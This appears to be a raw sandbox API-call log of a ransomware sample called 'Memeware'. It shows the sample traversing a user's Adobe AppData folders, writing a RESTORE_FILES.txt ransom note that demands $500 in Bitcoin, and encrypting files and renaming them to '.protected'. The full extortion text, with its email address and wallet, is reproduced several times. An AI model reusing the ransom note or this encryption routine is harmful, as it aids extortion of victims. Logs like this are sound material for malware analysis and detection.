pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat") returned 63 [0089.475] lstrcmpW (lpString1="Acrobat", lpString2=".") returned 1 [0089.475] lstrcmpW (lpString1="Acrobat", lpString2="..") returned 1 [0089.476] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\*") returned 65 [0089.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.476] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.476] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.476] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.476] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.476] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.476] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\.") returned 65 [0089.476] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.476] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.476] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.476] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.476] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.476] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.476] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.476] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\..") returned 66 [0089.476] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.476] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.476] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.476] lstrcmpiW (lpString1="10.0", lpString2="Windows") returned -1 [0089.476] lstrcmpiW (lpString1="10.0", lpString2="Program Files") returned -1 [0089.476] lstrcmpiW (lpString1="10.0", lpString2="Program Files (x86)") returned -1 [0089.476] lstrcmpiW (lpString1="10.0", lpString2="$Recycle.bin") returned 1 [0089.476] lstrcmpiW (lpString1="10.0", lpString2="System Volume Information") returned -1 [0089.476] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0") returned 68 [0089.476] lstrcmpW (lpString1="10.0", lpString2=".") returned 1 [0089.476] lstrcmpW (lpString1="10.0", lpString2="..") returned 1 [0089.477] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*") returned 70 [0089.477] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.477] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.477] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.477] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.477] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.477] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.477] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\.") returned 70 [0089.477] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.477] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.477] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.477] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.477] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.477] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.477] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.477] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\..") returned 71 [0089.477] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.477] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.477] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.477] lstrcmpiW (lpString1="Collab", lpString2="Windows") returned -1 [0089.477] lstrcmpiW (lpString1="Collab", lpString2="Program Files") returned -1 [0089.477] lstrcmpiW (lpString1="Collab", lpString2="Program Files (x86)") returned -1 [0089.477] lstrcmpiW (lpString1="Collab", lpString2="$Recycle.bin") returned 1 [0089.477] lstrcmpiW (lpString1="Collab", lpString2="System Volume Information") returned -1 [0089.477] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab") returned 75 [0089.477] lstrcmpW (lpString1="Collab", lpString2=".") returned 1 [0089.477] lstrcmpW (lpString1="Collab", lpString2="..") returned 1 [0089.478] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*") returned 77 [0089.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.478] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.478] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.478] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.478] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.478] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.478] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\.") returned 77 [0089.478] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.478] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.478] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.478] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.478] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.478] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.478] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.478] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\..") returned 78 [0089.478] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.478] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.478] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.478] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.478] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\RESTORE_FILES.txt") returned 93 [0089.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\collab\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.479] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.479] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.480] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.480] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.480] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.480] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.480] CloseHandle (hObject=0x150) returned 1 [0089.480] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.480] lstrcmpiW (lpString1="Forms", lpString2="Windows") returned -1 [0089.480] lstrcmpiW (lpString1="Forms", lpString2="Program Files") returned -1 [0089.480] lstrcmpiW (lpString1="Forms", lpString2="Program Files (x86)") returned -1 [0089.480] lstrcmpiW (lpString1="Forms", lpString2="$Recycle.bin") returned 1 [0089.480] lstrcmpiW (lpString1="Forms", lpString2="System Volume Information") returned -1 [0089.480] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms") returned 74 [0089.480] lstrcmpW (lpString1="Forms", lpString2=".") returned 1 [0089.480] lstrcmpW (lpString1="Forms", lpString2="..") returned 1 [0089.480] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*") returned 76 [0089.480] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.481] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.481] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.481] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.481] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.481] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.481] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\.") returned 76 [0089.481] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.481] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.481] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.481] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.481] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.481] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.481] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.481] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\..") returned 77 [0089.481] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.481] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.481] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.481] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.481] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\RESTORE_FILES.txt") returned 92 [0089.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\forms\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.482] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.482] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.483] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.483] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.483] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.483] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.483] CloseHandle (hObject=0x150) returned 1 [0089.483] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.483] lstrcmpiW (lpString1="JavaScripts", lpString2="Windows") returned -1 [0089.484] lstrcmpiW (lpString1="JavaScripts", lpString2="Program Files") returned -1 [0089.484] lstrcmpiW (lpString1="JavaScripts", lpString2="Program Files (x86)") returned -1 [0089.484] lstrcmpiW (lpString1="JavaScripts", lpString2="$Recycle.bin") returned 1 [0089.484] lstrcmpiW (lpString1="JavaScripts", lpString2="System Volume Information") returned -1 [0089.484] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts") returned 80 [0089.484] lstrcmpW (lpString1="JavaScripts", lpString2=".") returned 1 [0089.484] lstrcmpW (lpString1="JavaScripts", lpString2="..") returned 1 [0089.484] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*") returned 82 [0089.484] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.484] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.484] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.484] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.484] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.484] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.484] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\.") returned 82 [0089.484] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.484] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.484] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.484] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.484] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.484] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.484] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.484] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\..") returned 83 [0089.484] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.484] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.484] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.484] lstrcmpiW (lpString1="glob.js", lpString2="Windows") returned -1 [0089.484] lstrcmpiW (lpString1="glob.js", lpString2="Program Files") returned -1 [0089.484] lstrcmpiW (lpString1="glob.js", lpString2="Program Files (x86)") returned -1 [0089.484] lstrcmpiW (lpString1="glob.js", lpString2="$Recycle.bin") returned 1 [0089.484] lstrcmpiW (lpString1="glob.js", lpString2="System Volume Information") returned -1 [0089.484] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js") returned 88 [0089.484] StrStrIW (lpFirst="glob.js", lpSrch=".protected") returned 0x0 [0089.484] lstrcmpW (lpString1="glob.js", lpString2="RESTORE_FILES.txt") returned -1 [0089.484] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.484] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.484] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.485] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js") returned 88 [0089.485] StrStrW (lpFirst="glob.js", lpSrch=".txt") returned 0x0 [0089.485] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js") returned 88 [0089.485] StrStrW (lpFirst="glob.js", lpSrch=".rar") returned 0x0 [0089.485] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js") returned 88 [0089.485] StrStrW (lpFirst="glob.js", lpSrch=".zip") returned 0x0 [0089.485] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0089.485] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.485] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0089.485] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.485] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.486] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0089.486] CloseHandle (hObject=0x154) returned 1 [0089.486] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js.protected") returned 98 [0089.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js.protected")) returned 1 [0089.487] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.487] lstrcmpiW (lpString1="glob.settings.js", lpString2="Windows") returned -1 [0089.487] 